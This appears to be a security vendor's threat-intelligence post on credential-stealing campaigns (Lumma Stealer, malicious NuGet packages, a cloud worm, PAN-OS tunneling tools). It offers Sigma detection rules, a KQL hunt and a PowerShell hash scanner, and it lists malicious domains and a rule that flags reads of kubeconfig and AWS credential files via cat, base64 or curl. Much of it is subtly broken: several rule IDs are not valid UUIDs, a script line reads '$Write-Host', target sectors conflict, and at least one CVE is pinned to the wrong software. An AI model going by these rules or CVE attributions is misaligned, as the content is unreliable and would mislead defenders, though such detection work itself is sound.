Live OTX pulse data indicates a convergence of high-fidelity credential theft campaigns targeting both endpoints and cloud infrastructure. The threat landscape is dominated by the Remus variant of the Lumma Stealer, now active as a 64-bit infostealer utilizing EtherHiding for C2 resolvers. Concurrently, a sophisticated supply chain attack is underway via malicious NuGet packages impersonating Chinese UI libraries to deliver credential harvesters. In the cloud sphere, the PCPJack worm is actively exploiting containerized environments to evict the TeamPCP actor while harvesting credentials from Kubernetes and Docker configurations. Additionally, Operation GriefLure represents an APT-style campaign utilizing spear phishing with legal document lures to target telecom and healthcare sectors in Vietnam and the Philippines. Finally, a critical PAN-OS zero-day is being exploited to deploy tunneling tools like EarthWorm, facilitating lateral movement and credential exfiltration.
Collective Objective: The primary objective across these pulses is the mass harvesting of credentials (browser, crypto, SSH, cloud API keys) to establish persistent access and facilitate further exploitation or data exfiltration.
Threat Actor / Malware Profile
Malware: Lumma Stealer (Remus Variant)
- Type: 64-bit Infostealer
- Distribution: Initial access via Typosquatting NuGet packages and cracked software distribution.
- Behavior: Targets browser credentials, cryptocurrency wallets, and two-factor authentication (2FA) extensions. The Remus variant employs EtherHiding to bypass network-based detection and uses anti-analysis checks to evade sandboxes.
- C2 Communication: Utilizes blockchain transactions for C2 resolution (EtherHiding) to prevent takedown.
Malware: PCPJack
- Type: Cloud Worm / Credential Theft Framework
- Distribution: Exploits vulnerabilities in Kubernetes and Docker (e.g., CVE-2025-29927).
- Behavior: Propagates across exposed cloud infrastructure, specifically targeting misconfigured containers. It systematically removes TeamPCP artifacts and harvests credentials from cloud metadata services, configuration files, and developer tools.
- C2 Communication: Exfiltrates data to attacker-controlled infrastructure via covert channels.
Threat Actor: Operation GriefLure
- Type: APT / Targeted Spear Phishing
- Vector: Weaponized PDF documents masquerading as legal breach disputes and whistleblower complaints.
- Behavior: Living-off-the-land (LotL) techniques to drop payloads (sfsvc.exe, 360.dll) aimed at stealing sensitive corporate data and credentials from high-value targets in the Defense and Healthcare sectors.
Tooling: EarthWorm / ReverseSocks5
- Context: Deployed following the exploitation of PAN-OS CVE-2023-33538.
- Behavior: SOCKS5 proxying and tunneling tools used to pivot internally from compromised perimeter firewalls, enabling credential dumping on internal network segments.
IOC Analysis
The provided pulses contain a mix of infrastructure and file-based indicators:
- Domains/URLs: Numerous C2 domains such as
dns-providersa2.com,forestoaker.com, andlastpass-login-help.com(typosquatting). These should be blocked immediately at the DNS and Proxy level. - File Hashes: SHA256 and MD5 hashes associated with .NET payloads (NuGet), Lumma binaries, and PCPJack droppers. These indicate specific files on disk or in memory.
- CVEs: Critical vulnerabilities including
CVE-2025-29927(K8s/Docker) andCVE-2023-33538(PAN-OS) are primary exploitation vectors.
Operational Guidance: SOC teams should load the file hashes into EDR threat feeds and block the domains. CVE data should be cross-referenced with vulnerability management platforms to identify exposed assets.
Detection Engineering
YAML
title: Suspicious NuGet Package Execution - Supply Chain Attack
id: 488417de-1c5b-4d4b-a4f9-658411c7d1e8
description: Detects execution of processes spawned from NuGet packages or msbuild.exe involving suspicious paths or obfuscation often associated with the malicious NuGet campaign impersonating Chinese libraries.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7a
tags:
- attack.initial_access
- attack.t1195.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\msbuild.exe'
- '\nuget.exe'
- '\dotnet.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\rundll32.exe'
condition: selection
falsepositives:
- Legitimate build processes
level: high
---
title: Potential EarthWorm Tunneling Tool Execution
id: 592718df-2d6c-5e5c-b5g0-769522d8e2f9
description: Detects execution of EarthWorm or similar tunneling utilities often deployed after PAN-OS exploitation for lateral movement.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7e
tags:
- attack.command_and_control
- attack.t1572
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|contains:
- 'ew.exe'
- 'ew_for_win.exe'
- 're_georg.exe'
selection_cli:
CommandLine|contains:
- '-s'
- '-l'
- '-e'
- 'socks5'
condition: 1 of selection*
falsepositives:
- Rare legitimate administrative use of tunneling tools
level: critical
---
title: PCPJack Cloud Container Credential Access
id: 603829eg-3e7d-6f6d-c6h1-870633e9f3g0
description: Detects attempts to access cloud credentials or kubeconfig files by unauthorized processes or containers, indicative of PCPJack or similar cloud worms.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8e8d8f4c6a3a2c5e6b7c
tags:
- attack.credential_access
- attack.t1552.001
logsource:
product: linux
service: auditd
detection:
selection_access:
type: 'PATH'
name|contains:
- '/.kube/config'
- '/.aws/credentials'
- '/.docker/config.'
selection_context:
proctitle|contains:
- 'cat'
- 'base64'
- 'curl'
condition: selection_access and selection_context
falsepositives:
- Legitimate administration by authorized users
level: high
kql
// Hunt for network connections to known IOCs and suspicious file executions
let IOCDomains = dynamic(["dns-providersa2.com", "forestoaker.com", "krondez.com", "baxe.pics", "lastpass-login-help.com", "vinte.online", "remnane.biz"]);
let IOCHashes = dynamic(["efb675de4b3af3dac3c9cae91075fd7cc2f4f98e", "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824", "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d"]);
// Network Connections
DeviceNetworkEvents
| where RemoteUrl in~ IOCDomains or InitiatingProcessSHA256 in~ IOCHashes
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
// Process Creation for specific hashes
DeviceProcessEvents
| where SHA256 in~ IOCHashes
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath, SHA256
)
| order by Timestamp desc
powershell
<#
.SYNOPSIS
IOC Hunt Script for Lumma Stealer, NuGet Malware, and PCPJack artifacts.
.DESCRIPTION
Scans the file system for specific SHA256 hashes and suspicious NuGet package paths.
#>
$TargetHashes = @(
"019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
"34e2d63b5db7e24c808711c2ca0c0a42afde97a0086d7d81609110c002d18d7c",
"596c453c9dbb7240f1ce05cc025496524ce7c538c23a9b2171174bf32b5691a1",
"b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d",
"e41c635e4c3514e266d143d544ad1abde5db3dcfe6cccdf9bb7a218003f8ab6a"
)
$Write-Host "Starting IOC Hunt..."
# Scan User Profiles for Browser/Stealer related paths
$PathsToScan = @("$env:USERPROFILE\AppData\Local", "$env:USERPROFILE\AppData\Roaming", "C:\Users\")
foreach ($Path in $PathsToScan) {
if (Test-Path $Path) {
Write-Host "Scanning $Path for malicious binaries..."
Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | Where-Object {
!$_.PSIsContainer -and $_.Length -gt 0kb -and $_.Length -lt 10mb
} | ForEach-Object {
$Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
if ($Hash -in $TargetHashes) {
Write-Host "[ALERT] Malicious file found: $($_.FullName) with Hash: $Hash" -ForegroundColor Red
}
}
}
}
# Check for suspicious NuGet packages (bmrxntfj account)
$NugetPath = "$env:USERPROFILE\.nuget\packages"
if (Test-Path $NugetPath) {
Write-Host "Checking NuGet packages for typosquatted libraries..."
Get-ChildItem -Path $NugetPath -Recurse -Directory | Where-Object { $_.Name -like "*UI*" -or $_.Name -like "*Chinese*" } | Select-Object FullName
}
Write-Host "Hunt Complete."
# Response Priorities
* **Immediate:** Block all listed domains and IP addresses at the perimeter and DNS resolvers. Scan endpoints for the file hashes provided in the IOC Analysis. Identify and isolate any hosts with detected PAN-OS exploitation logs or unusual EarthWorm process execution.
* **24 Hours:** If credential-stealing malware (Lumma/Remus) is suspected, force a password reset for all browser-stored credentials and cryptocurrency wallets. Audit cloud environments (K8s/Docker) for unauthorized access signs and rotate API keys.
* **1 Week:** Audit the software supply chain; remove any NuGet packages associated with the account `bmrxntfj`. Patch all PAN-OS firewalls against CVE-2023-33538 and related CVEs immediately. Review and restrict lateral movement capabilities from perimeter devices.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialslumma-stealersupply-chain-attackpcphackcloud-credentialspan-os-rce
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.